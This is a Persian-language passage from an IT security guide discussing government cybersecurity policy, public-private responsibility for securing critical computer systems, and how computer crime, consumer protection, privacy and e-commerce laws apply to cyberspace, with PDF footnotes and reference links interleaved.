ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺳﺎﻳﺒﺮ ١ﺟﺪﻳﺪ ﺑـﺎ ﭼﻨـﺎﻥ
ﺳﺮﻋﺘﻲ ﺍﻧﺘﺸﺎﺭ ﻣﻲﻳﺎﺑﻨﺪ ﻛﻪ ﻣﻘﺮﺭﺍﺕ ﺩﻭﻟﺘﻲ ﺑﺮﺍﺣﺘـﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﻮﺍﻧﻌﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺳﺮﻳﻊ ﭘﺎﺳﺨﻬﺎﻱ ﻣﺒﺘﻜﺮﺍﻧـﻪ ﺷـﻮﻧﺪ.
ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻴـﺎﻥ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﺗﻘﻨﻴﻨـﻲ ﻭ
ﻏﻴﺮ ﺗﻘﻨﻴﻨﻲ ﻳﻚ ﻧﻘﻄﺔ ﺗﻌﺎﺩﻝ ﭘﻴـﺪﺍ ﻛﻨـﻴﻢ .ﺑـﺮﺍﻱ ﺩﺳـﺘﻴﺎﺑﻲ ﺑـﻪ
ﭼﻨﻴﻦ ﺗﻌﺎﺩﻟﻲ ،ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﺑﺮﺧﻲ ﻭﻳﮋﮔﻴﻬـﺎﻱ ﺫﺍﺗـﻲ ﻭ
ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺟﻪ ﻛﻨﻨﺪ .ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑـﺎ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ
ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﭘﻴﺸﻴﻦ ،ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ٢ﻳﻚ ﻓـﻀﺎﻱ ﻏﻴـﺮ
ﻣﺘﻤﺮﻛﺰ ﺍﺳﺖ .ﺑﺨﺸﻲ ﺍﺯ ﻗﺪﺭﺕ ﺍﻳﻨﺘﺮﻧﺖ ﻧﺎﺷﻲ ﺍﺯ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ
ﺍﺳﺖ ﻛﻪ ﻓﺎﻗﺪ ﺩﺭﺑﺎﻥ ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﻴﺸﺘﺮ ﻛـﺎﺭﺍﻳﻲ ﺁﻥ ﺩﺭ ﻣﺮﺯﻫـﺎﻱ
ﺷﺒﻜﻪ ﺍﺳﺖ ﺗﺎ ﺩﺭ ﻣﺮﻛﺰ ﺁﻥ .ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ
ﺍﻳﻦ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ .ﺩﺭ ﺍﻳـﻦ ﻓـﺼﻞ
ﺳﻠﺴﻠﻪ ﮔﺎﻣﻬﺎﻳﻲ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﻭﻟﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺁﻧﻬﺎ ﻭ ﻣﺴﺘﻘﻞ ﺍﺯ ﺗﺼﻤﻴﻤﮕﻴﺮﻳﻬﺎﻱ ﻓﻨﻲ ،ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧـﻮﺩ
٣
ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ.
ﺑﺎ ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ،
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻳﻚ ﺟﺰﺀ ﻳﺎ ﺗﻤﺎﻣﻲ ﺍﺟﺰﺍﻱ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﻣﻬﻢ ﻭ ﺣﺴﺎﺱ ﻛـﻪ ﻣﺒﺘﻨـﻲ
ﺑﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﺴﺘﻨﺪ )ﺑﺎﻧﻜـﺪﺍﺭﻱ ،ﺣﻤـﻞ ﻭ ﻧﻘـﻞ ،ﺍﻧـﺮﮊﻱ،
ﺗﻮﻟﻴﺪ ﻭ ﻏﻴﺮﻩ( ﺗﺤﺖ ﺗﻤﻠـﻚ ﻭ ﻋﻤﻠﻜـﺮﺩ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ ﻗـﺮﺍﺭ
Cyber Threats
Cyberspace
۳
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
http://www.abanet.org/abapubs/books/cybercr
ime
http://www.isn.ethz.ch/crn
1
2
ﺩﺍﺭﻧﺪ ٤.ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗﺴﻤﺖ ﺍﻋﻈـﻢ ﻣـﺴﺌﻮﻟﻴﺖ ﻛـﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ
ﺍﻣﻨﻴﺖ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ .ﻋﻠﻴﺮﻏﻢ
ﺍﻳﻦ ﻣﺴﺌﻠﻪ ،ﻭﺟﻮﺩ ﻭ ﻛﺎﺭﺍﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺑـﺮﺍﻱ ﺭﻓـﺎﻩ
ﻻ ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﺍﺳﺖ ﻛـﻪ
ﻣﻠﻲ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ
ﺍﺯ ﺁﻥ ﺍﺳﺘﻘﺒﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭ ﻟﺬﺍ ﺩﻭﻟﺖ ﺑﻪ ﺁﻥ ﺗﻮﺟﻪ ﺯﻳﺎﺩﻱ
ﻻ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﺎﺹ ﺧـﻮﺩ ﺭﺍ
ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺩﻭﻟﺘﻬﺎ ﻣﻌﻤﻮ ﹰ
ﺩﺍﺭﻧﺪ؛ ﺍﺯ ﺟﻤﻠﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ،ﺧـﺪﻣﺎﺕ
ﺍﺿــﻄﺮﺍﺭﻱ ،ﺑﻬﺪﺍﺷــﺖ ﻭ ﺳــﺎﻳﺮ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ ﺿــﺮﻭﺭﻱ ﻣــﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﻏﺎﻟﺒﹰﺎ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺧﺼﻮﺻﻲ
ﻭﺍﺑــﺴﺘﻪﺍﻧــﺪ .ﺩﺭ ﻣﺠﻤــﻮﻉ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ
ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ ﻫﻤـﺎﻥ
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺘﻬﺎﻱ
ﺧﺼﻮﺻﻲ ﻃﺮﺍﺣﻲ ﻭ ﺳﺎﺧﺘﻪ ﺷﺪﻩﺍﻧﺪ ﻭ ﻟﺬﺍ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺁﻧﻬـﺎ
ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﺳﺖ.
ﺑﻮﺍﺳﻄﺔ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﺩﻻﻳﻞ ،ﻣـﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ
ﻣﻴﺎﻥ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧـﺼﻮﺻﻲ ﺗﻘـﺴﻴﻢ ﺷـﺪﻩ ﺍﺳـﺖ .ﺑﻌﻨـﻮﺍﻥ
ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ ،ﺩﻭﻟﺖ ﻣﺴﺌﻮﻟﻴﺖ "ﺗﻨﻈﻴﻢ ﺍﻣﻮﺭ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ" ﺭﺍ ﺑﺮ
ﻋﻬﺪﻩ ﺩﺍﺭﺩ؛ ﻳﻌﻨﻲ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻱ ﺻﺤﻴﺢ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ
ﺍﻳﻤﻨﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﺑﻜﺎﺭ ﮔﻴﺮﺩ .ﺑﻌﻼﻭﻩ ﺍﺯ ﻟﺤﺎﻅ ﺟﻬـﺎﻧﻲ
ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺩﻭﻟﺖ ﺑﺎﻳـﺪ ﺑـﺮﺍﻱ ﻣﺠـﺎﺯﺍﺕ ﻭ ﭘﻴـﺸﮕﻴﺮﻱ ﺍﺯ
ﺍﻧﺠــﺎﻡ ﺣﻤــﻼﺕ ﺑــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ،ﻣﺜــﻞ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺍﺯ ﻗﺪﺭﺕ ﻗﻮﺍﻧﻴﻦ ﺣﻘﻮﻕ ﻭ ﺟﺰﺍ ﻛﻤﻚ ﺑﮕﻴﺮﺩ.
ﻓﺮﺍﺗﺮ ﺍﺯ ﺁﻥ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺩﻭﻟﺘﻬﺎ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛﻪ ﺑـﺮﺍﻱ
ﺍﺭﺗﻘﺎﻱ ﺭﻭﺍﻟﻬﺎﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﺧـﺼﻮﺻﻲ
ﺑﺎﻳﺪ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻣﻀﺎﻋﻔﻲ ﺭﺍ ﻣﺘﺤﻤﻞ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺗﻼﺵ ﺑـﺮﺍﻱ
ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺗﻮﺳﻂ ﺩﻭﻟﺖ ﺍﺗﺨﺎﺫ ﺷـﻮﺩ ﻛـﻪ ﺑﺎﻋـﺚ
ﻧﺸﻮﻧﺪ ﻗﻮﺍﻧﻴﻦ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﻣﺠـﺎﻝ ﻇﻬـﻮﺭ ﺍﺑﺘﻜـﺎﺭﺍﺕ ﻭ
ﻧﻮﺁﻭﺭﻳﻬﺎ ﺭﺍ ﺑﮕﻴﺮﻧﺪ ،ﺑﻠﻜـﻪ ﺩﺭﻋـﻮﺽ ﻣﻨﺠـﺮ ﺑـﻪ ﺣـﺪﺍﻛﺜﺮ ﺷـﺪﻥ
ﻣﺰﺍﻳﺎﻱ ﺩﺧﺎﻟﺖ ﺩﻭﻟﺖ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﮔﺮﺩﻧـﺪ .ﺩﺭ ﻳـﻚ ﻓـﻀﺎﻱ
ﻫﻤﻜﺎﺭﻱ ،ﻧﻘﻄﻪ ﺗﻌﺎﺩﻟﻲ ﺑﻪ ﻗﺮﺍﺭ ﺯﻳﺮ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ:
•
۴
ﻓﺸﺎﺭ ﺑﺎﺯﺍﺭ ﻛﺎﺭ ﻛﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﺭﺍ ﺑﺴﻮﻱ ﺍﻣﻨﻴـﺖ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺗﺮﻏﻴﺐ ﻣﻲﻛﻨﺪ ﺗـﺎ ﺳـﻮﺩ ﺑﻴـﺸﺘﺮﻱ
ﻛﺴﺐ ﻛﻨﻨﺪ؛
ﻼ ﺟﺪﻳـﺪ ﺍﺳـﺖ ،ﻭ
ﺩﺭ ﺑﻌﻀﻲ ﻛﺸﻮﺭﻫﺎ ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﻣﺴﺌﻠﻪﺍﻱ ﻛـﺎﻣ ﹰ
ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨـﺎ ﺍﺳـﺖ ﻛـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ،ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﺍﻥ ،ﻭ ﺳﻴﺎﺳـﺘﮕﺬﺍﺭﺍﻥ
ﺩﺭﺣﺎﻟﻴﻜــﻪ ﺑــﺎ ﻃﻴــﻒ ﻛــﺎﻣﻠﻲ ﺍﺯ ﻣــﺸﻜﻼﺕ ﺳــﻨﺘﻲ ﻣــﺮﺗﺒﻂ ﺑــﺎ
ﺧﺼﻮﺻﻲﺳﺎﺯﻱ ﺩﺳﺖ ﺑﻪ ﮔﺮﻳﺒﺎﻥ ﻫﺴﺘﻨﺪ ،ﺑﺘﺎﺯﮔﻲ ﺑﺎ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﻧﻴﺰ
ﺩﺳﺖ ﻭ ﭘﻨﺠﻪ ﻧﺮﻡ ﻣﻲﻛﻨﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٣٢
•
•
•
•
ﺗﺤﻘﻴﻘﺎﺕ ﺩﻭﻟﺘﻲ ﻭ ﺁﮔﺎﻩﺳﺎﺯﻱ؛
ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻛـﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺩﻭﻟﺘﻲ ﻭ ﺧﺼﻮﺻﻲ ﺣﻤﺎﻳﺖ ﻣﻲﻛﻨﻨﺪ؛
ﻣﻔﺎﻫﻴﻢ ﻗﻮﺍﻧﻴﻦ ﺳﻨﺘﻲ ﻛﻪ ﻭﺍﺭﺩ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﺪﻩﺍﻧﺪ؛ ﻭ
ﻗﻮﺍﻧﻴﻦ ،ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻛـﻪ ﺧـﺼﻮﺻﹰﺎ ﺑـﺮ
ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﻤﺮﻛﺰ ﻳﺎﻓﺘﻪﺍﻧﺪ.
ﻣﻔﻬﻮﻡ "ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻱ" ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺟﺰﺋﻲ ﺍﺯ ﻣﻮﺿـﻮﻉ
ﮔﺴﺘﺮﺩﻩﺗﺮﻱ ﺑﻪ ﻧﺎﻡ "ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﺩﺭ ﮔﺴﺘﺮﺵ ﺍﻋﺘﻤﺎﺩ ﺍﻳﻨﺘﺮﻧﺘـﻲ"
ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ .ﺍﻳﺠﺎﺩ ﻳـﻚ ﻣﺤـﻴﻂ ﻗﺎﺑـﻞ ﺍﻃﻤﻴﻨـﺎﻥ ﺩﺭ ﻓـﻀﺎﻱ
ﺳﺎﻳﺒﺮ ﻧﻴﺎﺯﻣﻨﺪ ﺗﻄﺒﻴﻖ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎ
ﺑﺮ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺳﺖ .ﺍﻳـﻦ ﺯﻣﻴﻨـﻪﻫـﺎ ﺷـﺎﻣﻞ ﺣﻤﺎﻳـﺖ ﺍﺯ
ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ،٥ﺧﺼﻮﺻﻲ ﻣﺎﻧﺪﻥ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ،٦ﺣﻘـﻮﻕ
ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨﻮﻱ ٧ﻭ ﭼﺎﺭﭼﻮﺏ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ٨ﻣﻲﺑﺎﺷـﺪ .ﺩﺭ
ﺩﻧﻴــﺎﻱ ﺑــﺪﻭﻥ ﺍﻳﻨﺘﺮﻧــﺖ ،ﻗــﺎﻧﻮﻥ ﺑــﺮﺍﻱ ﻣﻌــﺎﻣﻼﺕ ﺗﺠــﺎﺭﻱ ﻭ
ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺣﻤﺎﻳﺘﻬﺎﻳﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ .ﻗﺴﻤﺖ ﺍﻋﻈـﻢ ﺍﻳـﻦ
ﻗﻮﺍﻧﻴﻦ ﺩﺭ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻧﻴـﺰ ﻗﺎﺑـﻞ ﺍﻋﻤـﺎﻝ ﻫـﺴﺘﻨﺪ ،ﺍﻣـﺎ
ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺪﻧﺒﺎﻝ ﮔﺴﺘﺮﺵ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ
) (ICTﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﻛﻪ ﺁﻳﺎ ﺩﺭ ﻗﻮﺍﻧﻴﻦ
ﺁﻧﻬﺎ ﺧﻸﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣـﺎﻧﻊ ﺍﻳﺠـﺎﺩ ﺍﻋﺘﻤـﺎﺩ ﻻﺯﻡ ﺑـﺮﺍﻱ
ﺍﻓــﺰﺍﻳﺶ ﺍﻣﻨﻴــﺖ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﺷــﻮﺩ ﻳــﺎ ﺧﻴــﺮ .ﺩﺭ ﺣﻘﻴﻘــﺖ
ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﻋﻼﻗﻪﻣﻨﺪ ﺑـﻪ ﮔـﺴﺘﺮﺵ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﺑﻨﺪ ﻛﻪ ﻗﻮﺍﻧﻴﻦ ﺁﻧﻬـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ،ﻣﺎﻟﻜﻴﺖ ﺳﺎﻳﺒﺮ ﻭ ﺣﻤﺎﻳﺖ ﺍﺯ ﻣـﺼﺮﻑﻛﻨﻨـﺪﻩ ﺍﺯ ﺍﻋﺘﻤـﺎﺩ ﻳـﺎ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﻌﺎﻣﻼﺕ ﺧﺎﺭﺝ ﺍﺯ ﺩﻧﻴﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ
ﻧﻴﺴﺖ .ﺍﺻﻼﺡ ﻗﻮﺍﻧﻴﻦ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ
ﺍﺯ ﺍﺻﻼﺣﺎﺕ ﺭﻭﻱ ﻗﻮﺍﻧﻴﻦ ﻛﻠﻲﺗﺮ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﺗﻤﺮﻛﺰ ﺍﻳﻦ ﻛﺘـﺎﺏ
ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﻪ
ﺣﻤﻼﺕ ﺍﻧﺠﺎﻡﺷـﺪﻩ ﺭﻭﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺷـﺎﺭﻩ ﺩﺍﺭﻧـﺪ
)ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﺑﺨﺶ ﺳﻮﻡ ﻭ ﻧﻴﺰ ﺿﻤﺎﺋﻢ ﺫﻛﺮ ﺷﺪﻩﺍﻧـﺪ( ﻭ ﺳـﺆﺍﻻﺕ ﺩﺭ
ﭼﺎﺭﭼﻮﺏ ﻋﻤﻠﻜـﺮﺩ ﻭﺳـﻴﻌﺘﺮ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ
٩
ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑﻪ ﻣﻨﺎﺑﻊ ﺩﻳﮕﺮ ﻭﺍﮔﺬﺍﺭ ﻣﻲﻛﻨﺪ.
٩
Consumer Protection
Data & Communications Privacy
Intellectual Property Rights
E-Commerce Framework
ﺩﺭ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻭﻟﻴﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺟﻬﺎﻧﻲ ﻳﻚ ﺑﺨﺶ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ ﻃﻴـﻒ
ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑﺮ ﺗﻮﺳﻌﺔ ICTﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
5
6
7
8
ﺍﻳﻦ ﺑﺨﺶ ﻋﻼﻭﻩ ﺑـﺮ ﺗﻮﺿـﻴﺢ ﻣﻘـﺪﻣﺎﺗﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺸﻮﺭﻫﺎﻱ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ،ﺑﻪ ﺷﺮﺡ ﺟﺰﺋﻴﺎﺕ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﻛـﻪ
ﻣﻄﺎﺑﻖ ﻗﻮﺍﻧﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ
ﭼﻨﺪﻣﻠﻴﺘﻲ ﻫﺴﺘﻨﺪ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﺩ .ﻧﻜﺎﺕ ﻣﻄـﺮﺡ ﺷـﺪﻩ ﺑـﺎ ﺩﻗـﺖ
ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺷﺪﻩﺍﻧﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻤﺮﻛﺰ ﺑـﺮ ﻣﻨـﺎﺑﻊ ﻭ
ﻣﺪﻟﻬﺎﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﻣﺮﺍﻛﺰ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻧﺒﺎﻳﺪ ﺳـﺎﻳﺮ
ﻛﺸﻮﺭﻫﺎﻱ ﺟﻬﺎﻥ ﺭﺍ ﺍﺯ ﺍﻧﺠـﺎﻡ ﻣﻄﺎﻟﻌـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺍﻳـﻦ ﻣـﻮﺭﺩ
ﺑﺎﺯ ﺩﺍﺭﺩ .ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﺗﻤﺎﻣﻲ ﻛﺸﻮﺭﻫﺎ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻛﻨﻨﺪ،
١٠
ﭘﻴﺸﺮﻓﺖ ﻧﻤﺎﻳﻨﺪ ﻭ ﭼﺎﺭﭼﻮﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺧﻮﺩ ﺑﺮﮔﺰﻳﻨﻨﺪ .ﻣﻨـﺎﺑﻊ ﻣـﺎﻟﻲ ﻭ ﺍﻧـﺴﺎﻧﻲ ﺩﺭ ﺩﺳـﺘﺮﺱ ،ﻣﺘﻔـﺎﻭﺕ
ﻫﺴﺘﻨﺪ ﻭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺩﺭ ﺳﻄﺢ ﺍﺑﺘﺪﺍﻳﻲ ﺑﺎ ﺍﻳﻦ
ﻣﻮﺿﻮﻉ ﺑﺮﺧﻮﺭﺩ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﺻﻮﻝ ﮔﻔﺘـﻪﺷـﺪﻩ ﺩﺭ ﺍﻳﻨﺠـﺎ ﻛـﺎﺭﺑﺮﺩ
